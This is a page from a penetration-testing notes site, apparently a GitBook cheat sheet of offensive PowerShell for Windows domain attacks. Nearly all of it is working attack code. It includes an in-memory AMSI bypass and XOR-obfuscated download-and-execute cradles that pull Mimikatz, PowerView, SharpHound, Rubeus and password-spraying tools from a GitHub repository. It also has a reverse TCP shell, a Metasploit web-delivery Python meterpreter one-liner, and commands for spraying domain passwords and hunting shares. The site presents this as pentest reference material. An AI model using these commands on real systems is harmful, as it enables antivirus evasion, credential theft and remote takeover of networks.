Hacking
GithubTwitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Golang
Powershell / PowerView
PurpleSharp
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By GitBook
Powershell / PowerView
Sometimes your stuck with the tools in front of you and no linux etc
No AV
PowerUp / swap out with other scripts via shell
powershell -c "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.ps1'); invoke-sharefinder -checkshareaccess"
XOR Encode powershell payload
$file=([Text.Encoding]::UTF8.GetBytes([IO.File]::ReadAllText(".\Get-GPPPassword.ps1"))| %{$_ -bXor0x11})
[io.file]::WriteAllBytes('.\Get-GPPPassword.txt',$file)
Bypass AMSI
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
Import AD Recon
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/adrecon.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowerView
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerView.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import DomainPasswordSpray
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/DomainPasswordSpray.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
# Run with
Invoke-DomainPasswordSpray -domain thehackerlab.local -UsernameAsPassword -UserList users.txt -OutFile valid-creds.txt
Then
Invoke-DomainPasswordSpray -domain thehackerlab.local -UserList users.txt -OutFile valid-creds.txt -Password Winter2016
Import Get-GPPPassword
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Get-GPPPassword.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
# Run with
Get-GPPPassword -server thehackerlab.com
Import Sherlock
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-Sherlock.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowerUp
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import Sharphound
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-SharpHound.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import Mimikatz
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/mimikatz.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowershellTCP
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerShellTcp.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Upgrade nc shell to reverse meterpreter for pivoting
# Then run
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.1 -Port 4444
Download Rubeus.exe
$x = (New-Object System.Net.WebClient).downloadData(‘https://github.com/jdksec/RemoteTools/raw/master/Rubeus.exe’)
$y = [System.Reflection.Assembly]::Load($x)
[Rubeus.Program]::Main(“triage”.Split())
Install python from the windows store as a low priv user
# On attacking server
use exploit/multi/script/web_delivery
set lhost 192.168.1.1
set lport 80
set srvport 443
set payload python/meterpreter/reverse_tcp
exploit
# On victim machine
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.1:443/vcHsXENK', context=ssl._create_unverified_context());exec(r.read());"
Recon all computers in domain
Get-NetComputer –OperatingSystem *2003* | Out-File –Encoding ASCII Windows2003Hosts.txt
Get-NetComputer –OperatingSystem *2008* | Out-File –Encoding ASCII Windows2008Hosts.txt
Get-NetComputer –OperatingSystem *2012* | Out-File –Encoding ASCII Windows2012Hosts.txt
Get-NetComputer –OperatingSystem *2016* | Out-File –Encoding ASCII Windows2016Hosts.txt
Get-NetComputer –OperatingSystem *2019* | Out-File –Encoding ASCII Windows2019Hosts.txt
Get-NetComputer –OperatingSystem *XP* | Out-File –Encoding ASCII WindowsXPHosts.txt
Get-NetComputer –OperatingSystem *7* | Out-File –Encoding ASCII Windows7Hosts.txt
Get-NetComputer –OperatingSystem * 8* | Out-File –Encoding ASCII Windows8Hosts.txt
Get-NetComputer –OperatingSystem *10* | Out-File –Encoding ASCII Windows10Hosts.txt
Get list of all dns hostnames in domain
get-netcomputer -domain thehackerlab.local | select dnshostname | out-file -append allcomputers.txt
Count number of lines in file
get-content .\allcomputers.txt | measure-object -line
Find interesting shares
Get-NetComputer -domain thehackerlab.com | export-csv -Encoding ASCII allhosts.csv
import-csv .\allhosts.csv | select dnshostname | out-file dnshostnames.txt
get-content .\dnshostnames.txt | foreach-object {invoke-sharefinder -computername $_ -checkshareaccess} |export-csv -append shares.csv
Split csv to hostnames
import-csv .\shares.csv | select ComputerName > hostnames.txt
Sort hostnames so they are unique
type .\hostnames.txt | get-unique |out-file uniquehostnames.txt
Get live IP addresses
Get-Content .\allcomputers.txt | ForEach-Object{
$hostname = ([system.net.dns]::gethostaddresses("$_")).IPAddressToString
if($? -eq $True) {
$_ +": "+ $hostname
$hostname >> ipaddresses.txt
}
else {
$_ +": Cannot resolve hostname"
}}
Remove all external addresses
type ipaddresses.txt | findstr "192.168 10. 172.32" > internalips.txt
Guides - Previous
Golang
Next - Guides
PurpleSharp
Last modified 2mo ago
Copy link